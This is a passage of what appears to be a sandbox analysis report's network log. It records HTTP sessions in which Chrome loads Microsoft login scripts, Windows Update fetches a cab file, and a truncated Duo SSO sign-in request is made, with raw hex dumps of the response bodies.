                                                                                                                                          x-ms-blob-type: BlockBlob
                                                                                                                                          x-ms-lease-status: unlocked
                                                                                                                                          x-ms-request-id: 21996301-501e-00c2-0976-7e8866000000
                                                                                                                                          x-ms-version: 2009-09-19
                                                                                                                                          Content-Length: 1592
                                                                                                                                          Connection: close
                                                                                                                                          2024-11-18 05:47:55 UTC1592INData Raw: 3c 73 76 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 73 76 67 22 20 77 69 64 74 68 3d 22 34 38 22 20 68 65 69 67 68 74 3d 22 34 38 22 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 34 38 20 34 38 22 3e 3c 64 65 66 73 3e 3c 73 74 79 6c 65 3e 2e 61 7b 66 69 6c 6c 3a 6e 6f 6e 65 3b 7d 2e 62 7b 66 69 6c 6c 3a 23 34 30 34 30 34 30 3b 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 64 65 66 73 3e 3c 72 65 63 74 20 63 6c 61 73 73 3d 22 61 22 20 77 69 64 74 68 3d 22 34 38 22 20 68 65 69 67 68 74 3d 22 34 38 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 62 22 20 64 3d 22 4d 34 30 2c 33 32 2e 35 37 38 56 34 30 48 33 32 56 33 36 48 32 38 56 33 32 48 32 34 56 32 38 2e 37 36 36 41 31 30 2e 36 38 39 2c 31 30 2e 36 38 39 2c 30 2c 30 2c
                                                                                                                                          Data Ascii: <svg xmlns="http://www.w3.org/2000/svg" width="48" height="48" viewBox="0 0 48 48"><defs><style>.a{fill:none;}.b{fill:#404040;}</style></defs><rect class="a" width="48" height="48"/><path class="b" d="M40,32.578V40H32V36H28V32H24V28.766A10.689,10.689,0,0,


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                          58192.168.2.1655186152.199.21.1754436248C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                          2024-11-18 05:47:55 UTC441OUTGET /shared/1.0/content/js/asyncchunk/convergedlogin_pstringcustomizationhelper_4285088f1dbaf52a876d.js HTTP/1.1
                                                                                                                                          Host: aadcdn.msftauth.net
                                                                                                                                          Connection: keep-alive
                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                          Accept: */*
                                                                                                                                          Sec-Fetch-Site: none
                                                                                                                                          Sec-Fetch-Mode: cors
                                                                                                                                          Sec-Fetch-Dest: empty
                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                          2024-11-18 05:47:55 UTC750INHTTP/1.1 200 OK
                                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                                          Access-Control-Expose-Headers: x-ms-request-id,Server,x-ms-version,Content-Type,Content-Encoding,Cache-Control,Last-Modified,ETag,Content-MD5,x-ms-lease-status,x-ms-blob-type,Content-Length,Date,Transfer-Encoding
                                                                                                                                          Age: 8100973
                                                                                                                                          Cache-Control: public, max-age=31536000
                                                                                                                                          Content-MD5: 07aumYbfJEqwNBLMcAM10A==
                                                                                                                                          Content-Type: application/x-javascript
                                                                                                                                          Date: Mon, 18 Nov 2024 05:47:55 GMT
                                                                                                                                          Etag: 0x8DCBD52F42903D2
                                                                                                                                          Last-Modified: Thu, 15 Aug 2024 17:51:56 GMT
                                                                                                                                          Server: ECAcc (lhc/78A7)
                                                                                                                                          Vary: Accept-Encoding
                                                                                                                                          X-Cache: HIT
                                                                                                                                          x-ms-blob-type: BlockBlob
                                                                                                                                          x-ms-lease-status: unlocked
                                                                                                                                          x-ms-request-id: 22797220-301e-0043-49cf-ef2c70000000
                                                                                                                                          x-ms-version: 2009-09-19
                                                                                                                                          Content-Length: 113769
                                                                                                                                          Connection: close
                                                                                                                                          2024-11-18 05:47:55 UTC16383INData Raw: 2f 2a 21 0a 20 2a 20 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 20 53 54 41 52 54 20 4f 46 20 54 48 49 52 44 20 50 41 52 54 59 20 4e 4f 54 49 43 45 20 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 0a 20 2a 20 0a 20 2a 20 54 68 69 73 20 66 69 6c 65 20 69 73 20 62 61 73 65 64 20 6f 6e 20 6f 72 20 69 6e 63 6f 72 70 6f 72 61 74 65 73 20 6d 61 74 65 72 69 61 6c 20 66 72 6f 6d 20 74 68 65 20 70 72 6f 6a 65 63 74 73 20 6c 69 73 74 65 64 20 62 65 6c 6f 77 20 28 54 68 69 72 64 20 50 61 72 74 79 20 49 50 29 2e 20 54 68 65 20 6f 72 69 67 69 6e 61 6c 20 63 6f 70 79 72 69 67 68 74 20 6e 6f 74 69 63 65 20 61
                                                                                                                                          Data Ascii: /*! * ------------------------------------------- START OF THIRD PARTY NOTICE ----------------------------------------- * * This file is based on or incorporates material from the projects listed below (Third Party IP). The original copyright notice a
                                                                                                                                          2024-11-18 05:47:55 UTC1INData Raw: 75
                                                                                                                                          Data Ascii: u
                                                                                                                                          2024-11-18 05:47:55 UTC16383INData Raw: 32 30 30 61 22 2c 22 68 61 6c 66 22 3a 22 5c 78 62 64 22 2c 22 68 61 6d 69 6c 74 22 3a 22 5c 75 32 31 30 62 22 2c 22 48 41 52 44 63 79 22 3a 22 5c 75 30 34 32 61 22 2c 22 68 61 72 64 63 79 22 3a 22 5c 75 30 34 34 61 22 2c 22 68 61 72 72 63 69 72 22 3a 22 5c 75 32 39 34 38 22 2c 22 68 61 72 72 22 3a 22 5c 75 32 31 39 34 22 2c 22 68 41 72 72 22 3a 22 5c 75 32 31 64 34 22 2c 22 68 61 72 72 77 22 3a 22 5c 75 32 31 61 64 22 2c 22 48 61 74 22 3a 22 5e 22 2c 22 68 62 61 72 22 3a 22 5c 75 32 31 30 66 22 2c 22 48 63 69 72 63 22 3a 22 5c 75 30 31 32 34 22 2c 22 68 63 69 72 63 22 3a 22 5c 75 30 31 32 35 22 2c 22 68 65 61 72 74 73 22 3a 22 5c 75 32 36 36 35 22 2c 22 68 65 61 72 74 73 75 69 74 22 3a 22 5c 75 32 36 36 35 22 2c 22 68 65 6c 6c 69 70 22 3a 22 5c 75 32 30
                                                                                                                                          Data Ascii: 200a","half":"\xbd","hamilt":"\u210b","HARDcy":"\u042a","hardcy":"\u044a","harrcir":"\u2948","harr":"\u2194","hArr":"\u21d4","harrw":"\u21ad","Hat":"^","hbar":"\u210f","Hcirc":"\u0124","hcirc":"\u0125","hearts":"\u2665","heartsuit":"\u2665","hellip":"\u20
                                                                                                                                          2024-11-18 05:47:56 UTC16383INData Raw: 39 30 66 22 2c 22 52 42 61 72 72 22 3a 22 5c 75 32 39 31 30 22 2c 22 72 62 62 72 6b 22 3a 22 5c 75 32 37 37 33 22 2c 22 72 62 72 61 63 65 22 3a 22 7d 22 2c 22 72 62 72 61 63 6b 22 3a 22 5d 22 2c 22 72 62 72 6b 65 22 3a 22 5c 75 32 39 38 63 22 2c 22 72 62 72 6b 73 6c 64 22 3a 22 5c 75 32 39 38 65 22 2c 22 72 62 72 6b 73 6c 75 22 3a 22 5c 75 32 39 39 30 22 2c 22 52 63 61 72 6f 6e 22 3a 22 5c 75 30 31 35 38 22 2c 22 72 63 61 72 6f 6e 22 3a 22 5c 75 30 31 35 39 22 2c 22 52 63 65 64 69 6c 22 3a 22 5c 75 30 31 35 36 22 2c 22 72 63 65 64 69 6c 22 3a 22 5c 75 30 31 35 37 22 2c 22 72 63 65 69 6c 22 3a 22 5c 75 32 33 30 39 22 2c 22 72 63 75 62 22 3a 22 7d 22 2c 22 52 63 79 22 3a 22 5c 75 30 34 32 30 22 2c 22 72 63 79 22 3a 22 5c 75 30 34 34 30 22 2c 22 72 64 63 61
                                                                                                                                          Data Ascii: 90f","RBarr":"\u2910","rbbrk":"\u2773","rbrace":"}","rbrack":"]","rbrke":"\u298c","rbrksld":"\u298e","rbrkslu":"\u2990","Rcaron":"\u0158","rcaron":"\u0159","Rcedil":"\u0156","rcedil":"\u0157","rceil":"\u2309","rcub":"}","Rcy":"\u0420","rcy":"\u0440","rdca
                                                                                                                                          2024-11-18 05:47:56 UTC16383INData Raw: 74 72 69 63 74 22 3b 74 2e 41 6e 79 3d 72 28 38 38 34 29 2c 74 2e 43 63 3d 72 28 38 38 35 29 2c 74 2e 43 66 3d 72 28 31 33 38 31 29 2c 74 2e 50 3d 72 28 37 38 34 29 2c 74 2e 5a 3d 72 28 38 38 36 29 7d 2c 31 33 38 31 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 65 2e 65 78 70 6f 72 74 73 3d 2f 5b 5c 78 41 44 5c 75 30 36 30 30 2d 5c 75 30 36 30 35 5c 75 30 36 31 43 5c 75 30 36 44 44 5c 75 30 37 30 46 5c 75 30 38 45 32 5c 75 31 38 30 45 5c 75 32 30 30 42 2d 5c 75 32 30 30 46 5c 75 32 30 32 41 2d 5c 75 32 30 32 45 5c 75 32 30 36 30 2d 5c 75 32 30 36 34 5c 75 32 30 36 36 2d 5c 75 32 30 36 46 5c 75 46 45 46 46 5c 75 46 46 46 39 2d 5c 75 46 46 46 42 5d 7c 5c 75 44 38 30 34 5b 5c 75 44 43 42 44 5c 75 44 43 43 44 5d 7c 5c 75 44 38 32 46 5b 5c 75 44 43 41 30 2d 5c
                                                                                                                                          Data Ascii: trict";t.Any=r(884),t.Cc=r(885),t.Cf=r(1381),t.P=r(784),t.Z=r(886)},1381:function(e,t){e.exports=/[\xAD\u0600-\u0605\u061C\u06DD\u070F\u08E2\u180E\u200B-\u200F\u202A-\u202E\u2060-\u2064\u2066-\u206F\uFEFF\uFFF9-\uFFFB]|\uD804[\uDCBD\uDCCD]|\uD82F[\uDCA0-\
                                                                                                                                          2024-11-18 05:47:56 UTC16383INData Raw: 4d 61 72 6b 73 5b 74 5d 3b 69 66 28 65 2e 73 43 6f 75 6e 74 5b 74 5d 2d 65 2e 62 6c 6b 49 6e 64 65 6e 74 3e 3d 34 29 72 65 74 75 72 6e 21 31 3b 69 66 28 34 32 21 3d 3d 28 6f 3d 65 2e 73 72 63 2e 63 68 61 72 43 6f 64 65 41 74 28 75 2b 2b 29 29 26 26 34 35 21 3d 3d 6f 26 26 39 35 21 3d 3d 6f 29 72 65 74 75 72 6e 21 31 3b 66 6f 72 28 69 3d 31 3b 75 3c 6c 3b 29 7b 69 66 28 28 61 3d 65 2e 73 72 63 2e 63 68 61 72 43 6f 64 65 41 74 28 75 2b 2b 29 29 21 3d 3d 6f 26 26 21 6e 28 61 29 29 72 65 74 75 72 6e 21 31 3b 61 3d 3d 3d 6f 26 26 69 2b 2b 7d 72 65 74 75 72 6e 21 28 69 3c 33 29 26 26 28 73 7c 7c 28 65 2e 6c 69 6e 65 3d 74 2b 31 2c 28 63 3d 65 2e 70 75 73 68 28 22 68 72 22 2c 22 68 72 22 2c 30 29 29 2e 6d 61 70 3d 5b 74 2c 65 2e 6c 69 6e 65 5d 2c 63 2e 6d 61 72
                                                                                                                                          Data Ascii: Marks[t];if(e.sCount[t]-e.blkIndent>=4)return!1;if(42!==(o=e.src.charCodeAt(u++))&&45!==o&&95!==o)return!1;for(i=1;u<l;){if((a=e.src.charCodeAt(u++))!==o&&!n(a))return!1;a===o&&i++}return!(i<3)&&(s||(e.line=t+1,(c=e.push("hr","hr",0)).map=[t,e.line],c.mar
                                                                                                                                          2024-11-18 05:47:56 UTC16383INData Raw: 75 72 6e 20 72 3d 65 2e 73 72 63 2e 73 6c 69 63 65 28 63 2b 31 2c 6c 29 2c 73 2e 74 65 73 74 28 72 29 3f 28 6f 3d 65 2e 6d 64 2e 6e 6f 72 6d 61 6c 69 7a 65 4c 69 6e 6b 28 72 29 2c 21 21 65 2e 6d 64 2e 76 61 6c 69 64 61 74 65 4c 69 6e 6b 28 6f 29 26 26 28 74 7c 7c 28 28 69 3d 65 2e 70 75 73 68 28 22 6c 69 6e 6b 5f 6f 70 65 6e 22 2c 22 61 22 2c 31 29 29 2e 61 74 74 72 73 3d 5b 5b 22 68 72 65 66 22 2c 6f 5d 5d 2c 69 2e 6d 61 72 6b 75 70 3d 22 61 75 74 6f 6c 69 6e 6b 22 2c 69 2e 69 6e 66 6f 3d 22 61 75 74 6f 22 2c 28 69 3d 65 2e 70 75 73 68 28 22 74 65 78 74 22 2c 22 22 2c 30 29 29 2e 63 6f 6e 74 65 6e 74 3d 65 2e 6d 64 2e 6e 6f 72 6d 61 6c 69 7a 65 4c 69 6e 6b 54 65 78 74 28 72 29 2c 28 69 3d 65 2e 70 75 73 68 28 22 6c 69 6e 6b 5f 63 6c 6f 73 65 22 2c 22 61
                                                                                                                                          Data Ascii: urn r=e.src.slice(c+1,l),s.test(r)?(o=e.md.normalizeLink(r),!!e.md.validateLink(o)&&(t||((i=e.push("link_open","a",1)).attrs=[["href",o]],i.markup="autolink",i.info="auto",(i=e.push("text","",0)).content=e.md.normalizeLinkText(r),(i=e.push("link_close","a
                                                                                                                                          2024-11-18 05:47:56 UTC15470INData Raw: 22 62 61 6c 61 6e 63 65 5f 70 61 69 72 73 22 2c 22 65 6d 70 68 61 73 69 73 22 2c 22 74 65 78 74 5f 63 6f 6c 6c 61 70 73 65 22 5d 7d 7d 7d 7d 2c 31 34 32 38 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 72 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 65 2e 65 78 70 6f 72 74 73 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 66 75 6e 63 74 69 6f 6e 20 74 28 65 2c 74 29 7b 76 61 72 20 72 2c 6e 2c 73 2c 6f 2c 69 2c 61 3d 5b 5d 2c 63 3d 74 2e 6c 65 6e 67 74 68 3b 66 6f 72 28 72 3d 30 3b 72 3c 63 3b 72 2b 2b 29 34 33 3d 3d 3d 28 73 3d 74 5b 72 5d 29 2e 6d 61 72 6b 65 72 26 26 2d 31 21 3d 3d 73 2e 65 6e 64 26 26 28 6f 3d 74 5b 73 2e 65 6e 64 5d 2c 28 69 3d 65 2e 74 6f 6b 65 6e 73 5b 73 2e 74 6f 6b 65 6e 5d 29 2e 74 79 70 65 3d 22 69 6e 73 5f 6f 70 65 6e 22 2c 69 2e 74 61 67
                                                                                                                                          Data Ascii: "balance_pairs","emphasis","text_collapse"]}}}},1428:function(e,t,r){"use strict";e.exports=function(e){function t(e,t){var r,n,s,o,i,a=[],c=t.length;for(r=0;r<c;r++)43===(s=t[r]).marker&&-1!==s.end&&(o=t[s.end],(i=e.tokens[s.token]).type="ins_open",i.tag


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                          59192.168.2.165519020.12.23.50443
                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                          2024-11-18 05:48:05 UTC306OUTGET /SLS/%7BE7A50285-D08D-499D-9FF8-180FDC2332BC%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=dwUofH8SZLFcSGV&MD=BxftRVnd HTTP/1.1
                                                                                                                                          Connection: Keep-Alive
                                                                                                                                          Accept: */*
                                                                                                                                          User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33
                                                                                                                                          Host: slscr.update.microsoft.com
                                                                                                                                          2024-11-18 05:48:06 UTC560INHTTP/1.1 200 OK
                                                                                                                                          Cache-Control: no-cache
                                                                                                                                          Pragma: no-cache
                                                                                                                                          Content-Type: application/octet-stream
                                                                                                                                          Expires: -1
                                                                                                                                          Last-Modified: Mon, 01 Jan 0001 00:00:00 GMT
                                                                                                                                          ETag: "vic+p1MiJJ+/WMnK08jaWnCBGDfvkGRzPk9f8ZadQHg=_1440"
                                                                                                                                          MS-CorrelationId: f3bca256-5c02-4223-ac93-f079089db3de
                                                                                                                                          MS-RequestId: 1b99cc1a-df2a-4ccb-ba85-c873a339fbda
                                                                                                                                          MS-CV: gByTfiMH0EeqUm11.0
                                                                                                                                          X-Microsoft-SLSClientCache: 1440
                                                                                                                                          Content-Disposition: attachment; filename=environment.cab
                                                                                                                                          X-Content-Type-Options: nosniff
                                                                                                                                          Date: Mon, 18 Nov 2024 05:48:05 GMT
                                                                                                                                          Connection: close
                                                                                                                                          Content-Length: 30005
                                                                                                                                          2024-11-18 05:48:06 UTC15824INData Raw: 4d 53 43 46 00 00 00 00 8d 2b 00 00 00 00 00 00 44 00 00 00 00 00 00 00 03 01 01 00 01 00 04 00 5b 49 00 00 14 00 00 00 00 00 10 00 8d 2b 00 00 a8 49 00 00 00 00 00 00 00 00 00 00 64 00 00 00 01 00 01 00 72 4d 00 00 00 00 00 00 00 00 00 00 00 00 80 00 65 6e 76 69 72 6f 6e 6d 65 6e 74 2e 63 61 62 00 fe f6 51 be 21 2b 72 4d 43 4b ed 7c 05 58 54 eb da f6 14 43 49 37 0a 02 d2 b9 86 0e 41 52 a4 1b 24 a5 bb 43 24 44 18 94 90 92 52 41 3a 05 09 95 ee 54 b0 00 91 2e e9 12 10 04 11 c9 6f 10 b7 a2 67 9f bd cf 3e ff b7 ff b3 bf 73 ed e1 9a 99 f5 c6 7a d7 bb de f5 3e cf fd 3c f7 dc 17 4a 1a 52 e7 41 a8 97 1e 14 f4 e5 25 7d f4 05 82 82 c1 20 30 08 06 ba c3 05 02 11 7f a9 c1 ff d2 87 5c 1e f4 ed 65 8e 7a 1f f6 0a 40 03 1d 7b f9 83 2c 1c 2f db b8 3a 39 3a 58 38 ba 73 5e
                                                                                                                                          Data Ascii: MSCF+D[I+IdrMenvironment.cabQ!+rMCK|XTCI7AR$C$DRA:T.og>sz><JRA%} 0\ez@{,/:9:X8s^
                                                                                                                                          2024-11-18 05:48:06 UTC14181INData Raw: 06 03 55 04 06 13 02 55 53 31 13 30 11 06 03 55 04 08 13 0a 57 61 73 68 69 6e 67 74 6f 6e 31 10 30 0e 06 03 55 04 07 13 07 52 65 64 6d 6f 6e 64 31 1e 30 1c 06 03 55 04 0a 13 15 4d 69 63 72 6f 73 6f 66 74 20 43 6f 72 70 6f 72 61 74 69 6f 6e 31 26 30 24 06 03 55 04 03 13 1d 4d 69 63 72 6f 73 6f 66 74 20 54 69 6d 65 2d 53 74 61 6d 70 20 50 43 41 20 32 30 31 30 30 1e 17 0d 32 33 31 30 31 32 31 39 30 37 32 35 5a 17 0d 32 35 30 31 31 30 31 39 30 37 32 35 5a 30 81 d2 31 0b 30 09 06 03 55 04 06 13 02 55 53 31 13 30 11 06 03 55 04 08 13 0a 57 61 73 68 69 6e 67 74 6f 6e 31 10 30 0e 06 03 55 04 07 13 07 52 65 64 6d 6f 6e 64 31 1e 30 1c 06 03 55 04 0a 13 15 4d 69 63 72 6f 73 6f 66 74 20 43 6f 72 70 6f 72 61 74 69 6f 6e 31 2d 30 2b 06 03 55 04 0b 13 24 4d 69 63 72 6f
                                                                                                                                          Data Ascii: UUS10UWashington10URedmond10UMicrosoft Corporation1&0$UMicrosoft Time-Stamp PCA 20100231012190725Z250110190725Z010UUS10UWashington10URedmond10UMicrosoft Corporation1-0+U$Micro


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                          60192.168.2.1655193152.199.21.1754436248C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                          2024-11-18 05:48:09 UTC612OUTGET /shared/1.0/content/js/asyncchunk/convergedlogin_pidpredirect_e74b7f721910c56d695c.js HTTP/1.1
                                                                                                                                          Host: aadcdn.msftauth.net
                                                                                                                                          Connection: keep-alive
                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                          Accept: */*
                                                                                                                                          Sec-Fetch-Site: cross-site
                                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                                          Sec-Fetch-Dest: script
                                                                                                                                          Referer: https://login.microsoftonline.com/
                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                          2024-11-18 05:48:10 UTC748INHTTP/1.1 200 OK
                                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                                          Access-Control-Expose-Headers: x-ms-request-id,Server,x-ms-version,Content-Type,Content-Encoding,Cache-Control,Last-Modified,ETag,Content-MD5,x-ms-lease-status,x-ms-blob-type,Content-Length,Date,Transfer-Encoding
                                                                                                                                          Age: 7908286
                                                                                                                                          Cache-Control: public, max-age=31536000
                                                                                                                                          Content-MD5: ytKYPFdocuqla2exEMbdKg==
                                                                                                                                          Content-Type: application/x-javascript
                                                                                                                                          Date: Mon, 18 Nov 2024 05:48:10 GMT
                                                                                                                                          Etag: 0x8DCBD52F3D610E4
                                                                                                                                          Last-Modified: Thu, 15 Aug 2024 17:51:55 GMT
                                                                                                                                          Server: ECAcc (lhc/7955)
                                                                                                                                          Vary: Accept-Encoding
                                                                                                                                          X-Cache: HIT
                                                                                                                                          x-ms-blob-type: BlockBlob
                                                                                                                                          x-ms-lease-status: unlocked
                                                                                                                                          x-ms-request-id: 3d669b54-601e-0013-0b90-f1ee20000000
                                                                                                                                          x-ms-version: 2009-09-19
                                                                                                                                          Content-Length: 2976
                                                                                                                                          Connection: close
                                                                                                                                          2024-11-18 05:48:10 UTC2976INData Raw: 2f 2a 21 0a 20 2a 20 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 20 53 54 41 52 54 20 4f 46 20 54 48 49 52 44 20 50 41 52 54 59 20 4e 4f 54 49 43 45 20 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 0a 20 2a 20 0a 20 2a 20 54 68 69 73 20 66 69 6c 65 20 69 73 20 62 61 73 65 64 20 6f 6e 20 6f 72 20 69 6e 63 6f 72 70 6f 72 61 74 65 73 20 6d 61 74 65 72 69 61 6c 20 66 72 6f 6d 20 74 68 65 20 70 72 6f 6a 65 63 74 73 20 6c 69 73 74 65 64 20 62 65 6c 6f 77 20 28 54 68 69 72 64 20 50 61 72 74 79 20 49 50 29 2e 20 54 68 65 20 6f 72 69 67 69 6e 61 6c 20 63 6f 70 79 72 69 67 68 74 20 6e 6f 74 69 63 65 20 61
                                                                                                                                          Data Ascii: /*! * ------------------------------------------- START OF THIRD PARTY NOTICE ----------------------------------------- * * This file is based on or incorporates material from the projects listed below (Third Party IP). The original copyright notice a


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                          61192.168.2.1655194152.199.21.1754436248C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                          2024-11-18 05:48:11 UTC427OUTGET /shared/1.0/content/js/asyncchunk/convergedlogin_pidpredirect_e74b7f721910c56d695c.js HTTP/1.1
                                                                                                                                          Host: aadcdn.msftauth.net
                                                                                                                                          Connection: keep-alive
                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                          Accept: */*
                                                                                                                                          Sec-Fetch-Site: none
                                                                                                                                          Sec-Fetch-Mode: cors
                                                                                                                                          Sec-Fetch-Dest: empty
                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                          2024-11-18 05:48:11 UTC748INHTTP/1.1 200 OK
                                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                                          Access-Control-Expose-Headers: x-ms-request-id,Server,x-ms-version,Content-Type,Content-Encoding,Cache-Control,Last-Modified,ETag,Content-MD5,x-ms-lease-status,x-ms-blob-type,Content-Length,Date,Transfer-Encoding
                                                                                                                                          Age: 7908287
                                                                                                                                          Cache-Control: public, max-age=31536000
                                                                                                                                          Content-MD5: ytKYPFdocuqla2exEMbdKg==
                                                                                                                                          Content-Type: application/x-javascript
                                                                                                                                          Date: Mon, 18 Nov 2024 05:48:11 GMT
                                                                                                                                          Etag: 0x8DCBD52F3D610E4
                                                                                                                                          Last-Modified: Thu, 15 Aug 2024 17:51:55 GMT
                                                                                                                                          Server: ECAcc (lhc/7955)
                                                                                                                                          Vary: Accept-Encoding
                                                                                                                                          X-Cache: HIT
                                                                                                                                          x-ms-blob-type: BlockBlob
                                                                                                                                          x-ms-lease-status: unlocked
                                                                                                                                          x-ms-request-id: 3d669b54-601e-0013-0b90-f1ee20000000
                                                                                                                                          x-ms-version: 2009-09-19
                                                                                                                                          Content-Length: 2976
                                                                                                                                          Connection: close
                                                                                                                                          2024-11-18 05:48:11 UTC2976INData Raw: 2f 2a 21 0a 20 2a 20 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 20 53 54 41 52 54 20 4f 46 20 54 48 49 52 44 20 50 41 52 54 59 20 4e 4f 54 49 43 45 20 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 0a 20 2a 20 0a 20 2a 20 54 68 69 73 20 66 69 6c 65 20 69 73 20 62 61 73 65 64 20 6f 6e 20 6f 72 20 69 6e 63 6f 72 70 6f 72 61 74 65 73 20 6d 61 74 65 72 69 61 6c 20 66 72 6f 6d 20 74 68 65 20 70 72 6f 6a 65 63 74 73 20 6c 69 73 74 65 64 20 62 65 6c 6f 77 20 28 54 68 69 72 64 20 50 61 72 74 79 20 49 50 29 2e 20 54 68 65 20 6f 72 69 67 69 6e 61 6c 20 63 6f 70 79 72 69 67 68 74 20 6e 6f 74 69 63 65 20 61
                                                                                                                                          Data Ascii: /*! * ------------------------------------------- START OF THIRD PARTY NOTICE ----------------------------------------- * * This file is based on or incorporates material from the projects listed below (Third Party IP). The original copyright notice a


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                          62192.168.2.165519735.71.186.1514436248C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                          2024-11-18 05:48:13 UTC2105OUTGET /ws/sp/DIXH9AVY8FAAKO04PYZ8/passive?client-request-id=bd6b52e0-5340-4d63-be2e-ac65a40c1096&wa=wsignin1.0&wtrealm=urn%3afederation%3aMicrosoftOnline&wctx=LoginOptions%3D3%26estsredirect%3d2%26estsrequest%3drQQIARAAjZO9j9t0GMfj5C53FxUalReV7QaEEMLOz-_OSZXq2HlxEidx7MSNl8hx_G7nl9i-y8V_ARMqC0MnQEynDggWQGoFG7oBdWLoVDF2QOimY-NaFhYklkfPo-_32T6fygGL0RiOgY9KBAZO3qdYhqYoeoGShMWgVH0BUI60GRRf1smbiGAZy0zuVKovxuGT-6olP8Ue21_fqn5-gXzgZdk6PanVttstFvtWAlPoZCRDYxaMa5G5Wvor94z4HkGeIcij4r69QifqRTFlSI5haUAzdJ0kWMARdUwWG7EsjmNDb2aG5sWyD4Dclum-Lu1kMczkfEIN9K5nBIPYEN3dUAspOZjtDE3JjHY3NgQAjEA572shPdOVTBYn50bcJGWtmQ_EafC8eHvIn2Ye8WrAxM_tq-KRA5N4voZp9qj0W9EPBaFLE8ySlcDIDOXEkno42k9Al4jJDU8S7kZk6ts82FB5YpI4PxpDPmKn7gpVjDhtj6IWbj7oLOZero3kkOUADyUv84zhTNfTXmxGQ3Ey8eBgKhEwwokm3U9ndsPoWkvFWDjGA2odTX2VYqEkdDsUDeqAc1xbF3pN1VjYEhudAds37EUnjAdysODJTkpo6Kk_jADfak8TWQxyx90IOWGqM73jzc36aJ3L0kaZrCmlEaSKbcJFA-KKFOkgEr2Zx-SzdtziZ9ulT_dytbehRvY4d5iMZgh6AqglwSadZI62CIv30H7Di1Q3GovxvLPjLZ8cB4ngG-jO2QKn0WxY3VU-bdGNDS3j8ySMIoXnL0rv_RsS6Di-Zb_G44z4tlS-WWK [TRUNCATED]
                                                                                                                                          Host: sso-dbbfec7f.sso.duosecurity.com
                                                                                                                                          Connection: keep-alive
                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                          Upgrade-Insecure-Requests: 1
